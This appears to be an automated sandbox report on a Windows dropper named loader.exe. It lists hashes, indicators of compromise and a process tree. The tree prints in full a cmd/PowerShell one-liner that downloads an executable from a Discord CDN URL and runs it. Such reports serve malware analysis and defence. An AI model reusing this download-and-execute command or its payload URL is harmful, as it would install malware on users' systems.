db70abb95a7302474588baa296112aa57e27285b7bb5387c9e0274a2db2d3b30

Analysis

max time kernel
7s
max time network
12s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
20/04/2023, 19:02

Target

loader.exe
Size

23KB
MD5

7d8f0bb01ebdccc29ad69c58dae79440
SHA1

ff021306b6cf459724a6f7529da0966ac711b880
SHA256

db70abb95a7302474588baa296112aa57e27285b7bb5387c9e0274a2db2d3b30
SHA512

ea32ecd6feab5fb21038c0a6dfc6a8e3b1fed2abe94066778873e0e86e4c36da10887a2094fca2a4c92010f25bdd6b90e593dc8100941a61889900f227485db1
SSDEEP

384:oMCl4RB/K6dVupCqwVriyuN8bL/1UWdB/RAZ37rXyWAQriQSyEhD5b93fe9i:4l2//J/qF5AQVmtZ329i

Score

10^/10

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1093851490231259187/1094704667944034375/release2.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	4044	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4044	powershell.exe
4044	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4044	powershell.exe
Token: SeShutdownPrivilege	408	loader.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 408 wrote to memory of 3944	408	loader.exe	85
PID 408 wrote to memory of 3944	408	loader.exe	85
PID 3944 wrote to memory of 4044	3944	cmd.exe	86
PID 3944 wrote to memory of 4044	3944	cmd.exe	86
PID 408 wrote to memory of 4820	408	loader.exe	87
PID 408 wrote to memory of 4820	408	loader.exe	87

C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -c "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1093851490231259187/1094704667944034375/release2.exe', 'C:\Users\Public\releasePHQGHUMEAY.exe')"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1093851490231259187/1094704667944034375/release2.exe', 'C:\Users\Public\releasePHQGHUMEAY.exe')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Public\releasePHQGHUMEAY.exe
  2⤵
  PID:4820

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jx5upokj.eft.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4044-133-0x0000019AC4100000-0x0000019AC4122000-memory.dmp

Filesize
136KB

Download
memory/4044-134-0x0000019AA9220000-0x0000019AA9230000-memory.dmp

Filesize
64KB

Download
memory/4044-144-0x0000019AA9220000-0x0000019AA9230000-memory.dmp

Filesize
64KB

Download
memory/4044-145-0x0000019AA9220000-0x0000019AA9230000-memory.dmp

Filesize
64KB

Download